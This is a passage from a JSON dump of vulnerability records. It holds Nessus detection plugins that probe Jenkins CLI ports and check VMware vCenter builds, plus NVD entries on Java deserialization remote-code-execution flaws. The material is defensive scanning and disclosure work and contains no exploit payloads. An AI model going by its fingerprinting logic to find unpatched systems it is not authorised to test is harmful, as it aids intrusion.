thereof.\");\n\n script_dependencies(\"jenkins_detect.nasl\");\n script_require_keys(\"www/Jenkins\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:8080);\nget_kb_item_or_exit(\"www/Jenkins/\"+port+\"/Installed\");\n\n# LTS has a different version number\nis_LTS = get_kb_item(\"www/Jenkins/\"+port+\"/is_LTS\");\nif (is_LTS)\n{\n appname = \"Jenkins Open Source LTS\";\n fixed = \"1.625.2\";\n}\nelse\n{\n appname = \"Jenkins Open Source\";\n fixed = \"1.638\";\n}\n\n# check the patched versions\nversion = get_kb_item_or_exit(\"www/Jenkins/\"+port+\"/JenkinsVersion\");\nif (version == \"unknown\") audit(AUDIT_UNKNOWN_APP_VER, appname);\nif (ver_compare(ver: version, fix: fixed, strict: FALSE) >= 0) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\n# if the version is less than the patch version then check to see if the CLI port is enabled\nurl = build_url(qs:'/', port: port);\nres = http_send_recv3(method:\"GET\", item:url, port:port, exit_on_fail:TRUE);\nif ((\"X-Jenkins-CLI-Port\" >!< res[1]) &&\n (\"X-Jenkins-CLI2-Port\" >!< res[1]) &&\n (\"X-Hudson-CLI-Port\" >!< res[1])) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\n\n# Find a CLI port to examine\nitem = eregmatch(pattern:\"X-Jenkins-CLI-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\nif (isnull(item))\n{\n item = eregmatch(pattern:\"X-Hudson-CLI-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\n if (isnull(item))\n {\n item = eregmatch(pattern:\"X-Jenkins-CLI2-Port:\\s*([0-9]+)[ \\r\\n]\", string: res[1]);\n if (isnull(item)) audit(AUDIT_RESP_BAD, port);\n }\n}\n\nsock = open_sock_tcp(item[1]);\nif (!sock) audit(AUDIT_NOT_LISTEN, appname, item[1]);\n\nsend(socket: sock, data: '\\x00\\x14' + \"Protocol:CLI-connect\");\nreturn_val = recv(socket: sock, length: 20, min: 9, timeout: 1);\nclose(sock);\n\nif (isnull(return_val) || len(return_val) < 9) audit(AUDIT_RESP_BAD, res[1]);\nif (\"Unknown protocol:\" >< return_val) audit(AUDIT_INST_VER_NOT_VULN, appname, version);\nelse if (\"Welcome\" >!< return_val) audit(AUDIT_RESP_BAD, res[1]);\n\nif (report_verbosity > 0)\n{ \n report =\n '\\n Port : ' + item[1] +\n '\\n Product : ' + appname +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port: item[1], extra: report);\n}\nelse security_hole(item[1]);\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-27T15:23:03", "description": "The H3C or HPE Intelligent Management Center (iMC) web server running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted HTTP request, to execute arbitrary code on the target host.\n\nNote that Intelligent Management Center (iMC) is an HPE product;\nhowever, it is branded as H3C.", "cvss3": {}, "published": "2016-08-23T00:00:00", "type": "nessus", "title": "H3C / HPE Intelligent Management Center Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4372"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:hp:intelligent_management_center"], "id": "HP_IMC_CVE-2016-4372.NBIN", "href": "https://www.tenable.com/plugins/nessus/93079", "sourceData": "Binary data hp_imc_cve-2016-4372.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-11T14:25:33", "description": "The version of VMware vCenter Server Appliance installed on the remote host is 6.0 prior to Update 3b or 6.5 prior to Update c. It is, therefore, affected by a flaw in FlexBlazeDS when processing AMF3 messages due to allowing the instantiation of arbitrary classes when deserializing objects. An unauthenticated, remote attacker can exploit this, by sending a specially crafted Java object, to execute arbitrary code.", "cvss3": {}, "published": "2017-04-19T00:00:00", "type": "nessus", "title": "VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5641"], "modified": "2019-11-13T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server_appliance"], "id": "VMWARE_VCENTER_SERVER_APPLIANCE_VMSA-2017-0007.NASL", "href": "https://www.tenable.com/plugins/nessus/99474", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99474);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\"CVE-2017-5641\");\n script_bugtraq_id(97383);\n script_xref(name:\"VMSA\", value:\"2017-0007\");\n script_xref(name:\"CERT\", value:\"307983\");\n\n script_name(english:\"VMware vCenter Server Appliance BlazeDS AMF3 RCE (VMSA-2017-0007)\");\n script_summary(english:\"Checks the version of VMware vCenter Server Appliance.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization appliance installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware vCenter Server Appliance installed on the remote\nhost is 6.0 prior to Update 3b or 6.5 prior to Update c. It is,\ntherefore, affected by a flaw in FlexBlazeDS when processing AMF3\nmessages due to allowing the instantiation of arbitrary classes when\ndeserializing objects. An unauthenticated, remote attacker can exploit\nthis, by sending a specially crafted Java object, to execute arbitrary\ncode.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2017-0007.html\");\n # https://docs.vmware.com/en/VMware-vSphere/6.0/rn/vsphere-vcenter-server-60u3b-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1bb48b81\");\n # https://docs.vmware.com/en/VMware-vSphere/6.5/rn/vsphere-vcenter-server-650c-release-notes.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f0a01429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://codewhitesec.blogspot.com/2017/04/amf.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware vCenter Server Appliance 6.0 Update 3b / 6.5 Update\nc or later. Alternatively, apply the vendor-supplied workaround.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5641\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:vcenter_server_appliance\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/VMware vCenter Server Appliance/Version\", \"Host/VMware vCenter Server Appliance/Build\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nappname = 'VMware vCenter Server Appliance';\nversion = get_kb_item_or_exit(\"Host/\"+appname+\"/Version\");\nbuild = get_kb_item_or_exit(\"Host/\"+appname+\"/Build\");\nport = 0;\nfixversion_str = NULL;\n\nif (\n version !~ \"^6\\.0($|[^0-9])\" &&\n version !~ \"^6\\.5($|[^0-9])\"\n)\n audit(AUDIT_NOT_INST, appname + \" 6.0.x / 6.5.x\");\n\nif (version =~ \"^6\\.0($|[^0-9])\")\n{\n fixed_main_ver = \"6.0.0\";\n fixed_build = 5326079;\n\n if (int(build) < fixed_build)\n fixversion_str = fixed_main_ver + ' build-'+fixed_build;\n}\nelse if (version =~ \"^6\\.5($|[^0-9])\")\n{\n fixed_main_ver = \"6.5.0\";\n fixed_build = 5318112;\n\n if (int(build) < fixed_build)\n fixversion_str = fixed_main_ver + ' build-'+fixed_build;\n}\n\nif (isnull(fixversion_str))\n audit(AUDIT_INST_VER_NOT_VULN, appname, version, build);\n\nreport = report_items_str(\n report_items:make_array(\n \"Installed version\", version + ' build-' + build,\n \"Fixed version\", fixed_main_ver + ' build-' + fixed_build\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n);\nsecurity_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-07-16T00:03:44", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2016-0779. Reason: This candidate is a duplicate of CVE-2016-0779. Notes: All CVE users should reference CVE-2016-0779 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2015-12-16T21:59:00", "type": "cve", "title": "CVE-2015-8581", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2015-8581", "CVE-2016-0779"], "modified": "2017-04-12T01:59:00", "cpe": [], "id": "CVE-2015-8581", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8581", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}, {"lastseen": "2023-06-03T14:36:07", "description": "The Content-Encoding HTTP header feature in ws-xmlrpc 3.1.3 as used in Apache Archiva allows remote attackers to cause a denial of service (resource consumption) by decompressing a large file containing zeroes.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-06-06T18:29:00", "type": "cve", "title": "CVE-2016-5004", "cwe": ["CWE-400"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5004"], "modified": "2017-06-16T13:06:00", "cpe": ["cpe:/a:apache:ws-xmlrpc:3.1.3"], "id": "CVE-2016-5004", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5004", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:apache:ws-xmlrpc:3.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-29T23:38:26", "description": "Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-29T17:29:00", "type": "cve", "title": "CVE-2017-1000353", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353"], "modified": "2022-06-13T19:09:00", "cpe": ["cpe:/a:oracle:communications_cloud_native_core_automated_test_suite:1.9.0", "cpe:/a:jenkins:jenkins:2.56", "cpe:/a:jenkins:jenkins:2.46.1"], "id": "CVE-2017-1000353", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-1000353", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:jenkins:jenkins:2.56:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_cloud_native_core_automated_test_suite:1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:jenkins:jenkins:2.46.1:*:*:*:lts:*:*:*"]}, {"lastseen": "2023-06-03T14:42:07", "description": "The Suite REST API in VMware vRealize Operations (aka vROps) 6.x before 6.4.0 allows remote authenticated users to write arbitrary content to files or rename files via a crafted DiskFileItem in a relay-request payload that is mishandled during deserialization.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 8.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.7}, "published": "2016-12-29T09:59:00", "type": "cve", "title": "CVE-2016-7462", "cwe": ["CWE-264", "CWE-749"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7462"], "modified": "2017-07-28T01:29:00", "cpe": ["cpe:/a:vmware:vrealize_operations:6.3.0", "cpe:/a:vmware:vrealize_operations:6.0.0", "cpe:/a:vmware:vrealize_operations:6.1.0", "cpe:/a:vmware:vrealize_operations:6.2.0a", "cpe:/a:vmware:vrealize_operations:6.2.1"], "id": "CVE-2016-7462", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7462", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:C"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_operations:6.2.0a:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations:6.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations:6.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations:6.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_operations:6.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-13T11:34:15", "description": "Serialized-object interfaces in VMware vRealize Orchestrator 6.x, vCenter Orchestrator 5.x, vRealize Operations 6.x, vCenter Operations 5.x, and vCenter Application Discovery Manager (vADM) 7.x allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2015-12-21T03:59:00", "type": "cve", "title": "CVE-2015-6934", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6934"], "modified": "2016-11-28T19:40:00", "cpe": ["cpe:/a:vmware:vcenter_orchestrator:5.5.2", "cpe:/a:vmware:vrealize_orchestrator:6.0.2", "cpe:/a:vmware:vrealize_orchestrator:6.0.3", "cpe:/a:vmware:vrealize_orchestrator:6.0.1", "cpe:/a:vmware:vcenter_orchestrator:5.5.2.1", "cpe:/a:vmware:vcenter_orchestrator:5.5", "cpe:/a:vmware:vcenter_orchestrator:5.5.1"], "id": "CVE-2015-6934", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6934", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:vmware:vrealize_orchestrator:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_orchestrator:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_orchestrator:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vcenter_orchestrator:5.5.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-28T06:39:48", "description": "Adobe ColdFusion has an Untrusted Data Deserialization vulnerability. This affects Update 4 and earlier versions for ColdFusion 2016, and Update 12 and earlier versions for ColdFusion 11.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-01T08:29:00", "type": "cve", "title": "CVE-2017-11284", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11284"], "modified": "2020-09-04T14:09:00", "cpe": ["cpe:/a:adobe:coldfusion:2016", "cpe:/a:adobe:coldfusion:11.0"], "id": "CVE-2017-11284", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11284", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:adobe:coldfusion:2016:update1:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update6:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update9:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update5:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update3:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update10:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update3:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update7:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update11:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update8:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update2:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:update4:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:2016:-:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update12:*:*:*:*:*:*", "cpe:2.3:a:adobe:coldfusion:11.0:update1:*:*:*:*:*:*"]}, {"lastseen": "2023-08-13T10:27:30", "description": "Bamboo 2.2 before 5.8.5 and 5.9.x before 5.9.7 allows remote attackers with access to the Bamboo web interface to execute arbitrary Java code via an unspecified resource.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-03T01:29:00", "type": "cve", "title": "CVE-2015-6576", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6576"], "modified": "2019-05-03T17:33:00", "cpe": [], "id": "CVE-2015-6576", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-6576", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-03T14:45:06", "description": "Apache Camel's Jackson and JacksonXML unmarshalling operation are vulnerable to Remote Code Execution attacks.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-03-28T18:59:00", "type": "cve", "title": "CVE-2016-8749", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-8749"], "modified": "2019-05-24T11:29:00", "cpe": ["cpe:/a:apache:camel:2.16.2", "cpe:/a:apache:camel:2.17.4", "cpe:/a:apache:camel:2.18.0", "cpe:/a:apache:camel:2.18.1", "cpe:/a:apache:camel:2.16.0", "cpe:/a:apache:camel:2.17.1", "cpe:/a:apache:camel:2.17.2", "cpe:/a:apache:camel:2.17.0", "cpe:/a:apache:camel:2.16.3", "cpe:/a:apache:camel:2.16.1", "cpe:/a:apache:camel:2.17.3", "cpe:/a:apache:camel:2.16.4"], "id": "CVE-2016-8749", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-8749", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:camel:2.16.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:camel:2.17.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-13T12:30:24", "description": "The Web Console in Commvault Edge Server 10 R2 allows remote attackers to execute arbitrary OS commands via crafted serialized data in a cookie.", "cvss3": {}, "published": "2015-11-04T03:59:00", "type": "cve", "title": "CVE-2015-7253", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7253"], "modified": "2015-11-04T18:59:00", "cpe": ["cpe:/a:commvault:edge_server:10"], "id": "CVE-2015-7253", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7253", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:commvault:edge_server:10:r2:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:46:23", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T23:59:00", "type": "cve", "title": "CVE-2016-9299", "cwe": ["CWE-90"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2019-05-22T15:06:00", "cpe": ["cpe:/a:jenkins:jenkins:2.19.2", "cpe:/o:fedoraproject:fedora:25", 